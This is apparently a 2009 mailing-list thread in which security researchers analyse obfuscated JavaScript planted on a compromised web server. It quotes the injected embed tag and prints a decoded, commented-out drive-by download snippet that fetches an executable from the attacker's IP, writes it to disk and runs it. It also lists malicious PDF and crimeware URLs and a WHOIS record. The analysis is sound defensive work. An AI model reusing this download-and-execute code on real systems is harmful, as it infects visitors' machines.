RE: Malicious code just found on web server

Russell_Berg · April 17, 2009, 8:42pm

FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com

Chris_Mills · April 17, 2009, 10:06pm

I took a quick look at the code... formatted it in a pastebin here:
http://pastebin.com/m7b50be54

That javascript writes this to the page (URL obscured):
document.write("<embed
src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\"
width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");

The 1.2.3.4 in the URL is my public IP address (I changed that).

Below the javascript, it grabs a PDF:
<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>

That PDF is on the site, I haven't looked at it yet though.

-ChrisAM
http://securabit.com

Paul_Ferguson · April 17, 2009, 10:15pm

Most likely a file that exploits a well-known vulnerability in Adobe
Reader, which in turn probably loads malware from yet another location.

We've been seeing a lot of this lately.

- - ferg

Paul_Ferguson · April 17, 2009, 10:31pm

Yes, definitely malicious:

http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b

- - ferg

Chris_Mills · April 17, 2009, 10:34pm

You beat me to it.

-ChrisAM

Jake_Mailinglists · April 17, 2009, 10:39pm

Nice, bad code is actually on all of the error (404) pages for the site as
well as some other php pages.
The code is actually a base64 obfuscation technique to hide the actual
attack code.
Once decode the code attempts multiple attacks to try and get the victim to
download an executable

hxxp://77.92.158.122/webmail/inc/web/load.php

Virustotal results (3/40)
http://www.virustotal.com/analisis/180fc9b96543139b8328f2ae0a2d1bf3

Also this code appears to be trying to exploit specific browser types
(Chrome and Mozilla in particular) as can be seen from this code snippet of
the decode.

(Commented out each line just in case someone has a browser that will try
and render this)

//aaa_2626aKiupwzqp.setAttribute("style", "display: none; -moz-binding:
url('chrome://xbl-marquee/content/xbl-marquee.xml#marquee-horizontal');");
//document.body.appendChild(aaa_2626aKiupwzqp);
//var aaa_2626aLiupwzqp = aaa_2626aKiupwzqp.stop.eval.call(null,
"Function");
//var aaa_2626aMiupwzqp = aaa_2626aLiupwzqp("return function(C){ var
//file=C.classes['@
mozilla.org/file/local;1'].createInstance(C.interfaces.nsILocalFile);
file.initW
//ithPath('c:\\" + aaa_2626aHiupwzqp + ".exe'); return file; }")();
//window.file = aaa_2626aMiupwzqp(Components);
//var aaa_2626aNiupwzqp = aaa_2626aLiupwzqp("return function(C){ return
C.classes['@
mozilla.org/process/util;1'].createInstance(C.interfaces.nsIProcess);
//}")();
//window.process = aaa_2626aNiupwzqp(Components);
//var aaa_2626aOiupwzqp = aaa_2626aLiupwzqp("return function(C,file){
//io=C.classes['@
mozilla.org/network/io-service;1'].getService(C.interfaces.nsIIOService);source=i
//o.newURI('http://77.92.158.122/webmail/inc/web/load.php
','UTF8',null);persist=C.classes['@
mozilla.org/embedding/browser/nsWebBrowserPersist;1'].createI//nstance(C.int
//erfaces.nsIWebBrowserPersist);persist.persistFlags=8192|4096;persist.saveURI(source,null,null,null,null,file);
return persist; }")();
//window.persist = aaa_2626aOiupwzqp(Components,window.file);
//window.getState = aaa_2626aLiupwzqp("return function(persist) { return
persist.currentState; }")();
//window.processRun = aaa_2626aLiupwzqp("return function(process,file) {
process.init(file); process.run(false,[],0); }")();

Also attempts to download a hostile PDF file from a subdirectory underneath
this one which was created with a demo copy of Foxit.
hxxp://77.92.158.122/webmail/inc/web/include/two.pdf

INFO:
Version 2.321001 (possibly)
Created: 2009-02-19 1448hrs (-2 timezone)

There appear to be several other attacks within this code I can upload or
update this thread if you are interested in the other attacks.

Jake

Paul_Ferguson · April 18, 2009, 1:06am

Not only is that .pdf malicious, when "executed" it also fetches additional
malware from:

hxxp:// test1.ru /1.1.1/load.php

If that host is not in your block list, it should be -- known purveyor of
crimeware.

This is in addition to the other malicious URLs mentioned in this thread.

- - ferg

Jake_Mailinglists · April 20, 2009, 2:42pm

Paul,
I noticed that in the PDF file but as the domain doesn't seem to have
resolution I didn't mention it.

Jake

WHOIS information on the domain

Whois Record

domain: TEST1.RU
type: CORPORATE
nserver: ns1.centerhost.ru.
nserver: ns1.cetis.ru.
state: REGISTERED, DELEGATED
org: Center of Effective Technologies and Systems CETIS
phone: +7 4957711654
fax-no: +7 4957879251
e-mail: <http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a>
e-mail: <http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff>
registrar: REGRU-REG-RIPN
created: 2001.03.30
paid-till: 2010.04.03
source: TC-RIPN

Registry Data Created: 2001-03-30 Expires: 2010-04-03 Whois Server:
whois.ripn.net
Server Data Domain Status: Registered And No Website